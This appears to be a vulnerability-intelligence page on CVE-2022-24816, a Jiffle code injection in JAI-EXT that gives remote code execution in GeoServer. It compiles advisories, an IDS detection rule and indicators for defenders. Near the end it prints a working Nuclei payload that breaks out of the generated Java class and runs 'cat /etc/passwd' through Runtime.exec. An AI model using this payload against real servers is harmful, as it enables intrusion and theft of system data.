CVE-2022-24816
published 2022-04-13CVE-2022-24816: JAI-EXT is an open-source project which aims to extend the Java Advanced Imaging (JAI) API. Programs allowing Jiffle script to be provided via network request…
PriorityP1100critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2024-07-17
Exploited in the wild
EPSS
98.74%
99.9th percentile
JAI-EXT is an open-source project which aims to extend the Java Advanced Imaging (JAI) API. Programs allowing Jiffle script to be provided via network request can lead to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project. Version 1.2.22 will contain a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application, by removing janino-x.y.z.jar from the classpath.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| geosolutions-it | jai-ext | < 1.1.22 | 1.1.22 |
| geosolutionsgroup | jai-ext | < 1.1.22 | 1.1.22 |
Detection & IOCsextracted from sources · hover to see the quote
otherras:Jiffle
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Geoserver JT-Jiffle Extension Code Injection (CVE-2022-24816)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/geoserver/wms"; startswith; http.request_body; content:"|3c|ows|3a|Identifier|3e|ras|3a|Jiffle|3c 2f|ows|3a|Identifier|3e|"; fast_pattern; content:"java|2e|lang|2e|Runtime|2e|getRuntime|28 29|"; distance:0; reference:url,www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver; reference:cve,2022-24816; classtype:web-application-attack; sid:2056208; rev:1; metadata:affected_product Geoserver, attack_target Server, tls_state TLSDecrypt, created_at 2024_09_26, cve CVE_2022_24816, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_09_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes
|3c|ows|3a|Identifier|3e|ras|3a|Jiffle|3c 2f|ows|3a|Identifier|3e|
bytes
java|2e|lang|2e|Runtime|2e|getRuntime|28 29|
- →Exploit arrives as an HTTP POST to /geoserver/wms containing an ows:Identifier element referencing 'ras:Jiffle' and injected Java code invoking java.lang.Runtime.getRuntime() in the request body.
- →Successful exploitation produces an ExceptionInInitializerError in the HTTP response body alongside /etc/passwd content (root:.*:0:0:), which can be used as a response-side detection signal.
- →The malicious Jiffle script payload uses a comment-injection technique to break out of the generated Java class and inject an arbitrary static initializer block that executes OS commands via Runtime.exec().
- →Presence of janino-x.y.z.jar on the classpath is a prerequisite for exploitation; its presence in a GeoServer deployment should be treated as an attack-surface indicator when JAI-EXT is below version 1.1.22.
- ·The Snort/ET rule requires TLS decryption to be effective against HTTPS-protected GeoServer instances, as indicated by the TLSDecrypt deployment metadata.
- ·The patched version is JAI-EXT 1.1.22 (not 1.2.22 as stated in the NVD advisory); defenders should verify the exact artifact version on disk.
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa10.0CRITICAL
osv10.0CRITICAL
vulncheck10.0CRITICAL
cisa10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Improper Control of Generation of Code ('Code Injection') in jai-ext
ghsa·2023-09-19
CVE-2022-24816 [CRITICAL] CWE-94 Improper Control of Generation of Code ('Code Injection') in jai-ext
Improper Control of Generation of Code ('Code Injection') in jai-ext
### Impact
Programs using jt-jiffle, and allowing Jiffle script to be provided via network request, are susceptible to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project.
### Patches
Version 1.2.22 will contain a patch that disables the ability to inject malicious code into the resulting script.
### Workarounds
Negate the ability to compile Jiffle scripts from the final application, by removing janino-x.y.z.jar from the classpath.
### References
None.
OSV
Improper Control of Generation of Code ('Code Injection') in jai-ext
osv·2023-09-19
CVE-2022-24816 [CRITICAL] Improper Control of Generation of Code ('Code Injection') in jai-ext
Improper Control of Generation of Code ('Code Injection') in jai-ext
### Impact
Programs using jt-jiffle, and allowing Jiffle script to be provided via network request, are susceptible to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project.
### Patches
Version 1.2.22 will contain a patch that disables the ability to inject malicious code into the resulting script.
### Workarounds
Negate the ability to compile Jiffle scripts from the final application, by removing janino-x.y.z.jar from the classpath.
### References
None.
OSV
GeoServer RCE due to improper control of generation of code in jai-ext`Jiffle` map algebra language
osv·2023-06-12·CVSS 10.0
CVE-2023-35042 [CRITICAL] GeoServer RCE due to improper control of generation of code in jai-ext`Jiffle` map algebra language
GeoServer RCE due to improper control of generation of code in jai-ext`Jiffle` map algebra language
GeoServer 2, in some configurations, allows remote attackers to execute arbitrary code via `java.lang.Runtime.getRuntime().exec` in `wps:LiteralData` within a `wps:Execute` request, as exploited in the wild in June 2023.
## RCE in Jiffle
The Jiffle map algebra language, provided by jai-ext, allows efficiently execute map algebra over large images. A vulnerability [CVE-2022-24816](https://nvd.nist.gov/vuln/detail/CVE-2022-24816) has been recently found in Jiffle, that allows a Code Injection to be performed by properly crafting a Jiffle invocation.
In the case of GeoServer, the injection can be performed from a remote request.
## Assessment
GeoTools includes the Jiffle language as part
GHSA
GeoServer RCE due to improper control of generation of code in jai-ext`Jiffle` map algebra language
ghsa·2023-06-12·CVSS 10.0
CVE-2023-35042 [CRITICAL] GeoServer RCE due to improper control of generation of code in jai-ext`Jiffle` map algebra language
GeoServer RCE due to improper control of generation of code in jai-ext`Jiffle` map algebra language
GeoServer 2, in some configurations, allows remote attackers to execute arbitrary code via `java.lang.Runtime.getRuntime().exec` in `wps:LiteralData` within a `wps:Execute` request, as exploited in the wild in June 2023.
## RCE in Jiffle
The Jiffle map algebra language, provided by jai-ext, allows efficiently execute map algebra over large images. A vulnerability [CVE-2022-24816](https://nvd.nist.gov/vuln/detail/CVE-2022-24816) has been recently found in Jiffle, that allows a Code Injection to be performed by properly crafting a Jiffle invocation.
In the case of GeoServer, the injection can be performed from a remote request.
## Assessment
GeoTools includes the Jiffle language as part
VulnCheck
OSGeo GeoServer JAI-EXT Code Injection Vulnerability
vulncheck·2022·CVSS 10.0
CVE-2022-24816 [CRITICAL] CWE-94 OSGeo GeoServer JAI-EXT Code Injection Vulnerability
OSGeo GeoServer JAI-EXT Code Injection Vulnerability
OSGeo GeoServer JAI-EXT contains a code injection vulnerability that, when programs use jt-jiffle and allow Jiffle script to be provided via network request, could allow remote code execution.
Affected: OSGeo JAI-EXT
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2022-24816; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-23&host_type=src&vulnerability=cve-2022-24816; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-24&host_type=src&vulnera
CISA
OSGeo GeoServer JAI-EXT Code Injection Vulnerability
cisa·2024-06-26·CVSS 10.0
CVE-2022-24816 [CRITICAL] CWE-94 OSGeo GeoServer JAI-EXT Code Injection Vulnerability
Vulnerability: OSGeo GeoServer JAI-EXT Code Injection Vulnerability
Affected: OSGeo JAI-EXT
OSGeo GeoServer JAI-EXT contains a code injection vulnerability that, when programs use jt-jiffle and allow Jiffle script to be provided via network request, could allow remote code execution.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: This vulnerability affects a common open-source component, third-party library, or a protocol used by different products. The patched JAI-EXT is version 1.1.22: https://github.com/geosolutions-it/jai-ext/releases/tag/1.1.22, https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx; https://nvd.nist.gov/vuln/detail/CVE-2022-24816
Remediation Due Date:
Suricata
ET WEB_SPECIFIC_APPS Geoserver JT-Jiffle Extension Code Injection (CVE-2022-24816)
suricata·2024-09-26·CVSS 10.0
CVE-2022-24816 [CRITICAL] ET WEB_SPECIFIC_APPS Geoserver JT-Jiffle Extension Code Injection (CVE-2022-24816)
ET WEB_SPECIFIC_APPS Geoserver JT-Jiffle Extension Code Injection (CVE-2022-24816)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Geoserver JT-Jiffle Extension Code Injection (CVE-2022-24816)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/geoserver/wms"; startswith; http.request_body; content:"|3c|ows|3a|Identifier|3e|ras|3a|Jiffle|3c 2f|ows|3a|Identifier|3e|"; fast_pattern; content:"java|2e|lang|2e|Runtime|2e|getRuntime|28 29|"; distance:0; reference:url,www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver; reference:cve,2022-24816; classtype:web-application-attack; sid:2056208; rev:1; metadata:affected_product Geoserver, attack_target Server, tls_state TLSDecrypt, create
Nuclei
GeoServer <1.2.2 - Remote Code Execution
nuclei·CVSS 10.0
CVE-2022-24816 [CRITICAL] GeoServer <1.2.2 - Remote Code Execution
GeoServer
ras:Jiffle
coverage
script
dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**
outputType
DOUBLE
result
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "ExceptionInInitializerError"
condition: and
- type: status
status:
- 200
# digest: 490a004630440220587ec0b64216ae65fd47db2e8e19bf460b3bd383a38277312873a135bb0afd0802203c53c76e6c9e98e6
https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cbhttps://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rxhttps://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cbhttps://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rxhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-24816
2022-04-13
Published
2024-06-26
Added to CISA KEV
Exploited in the wild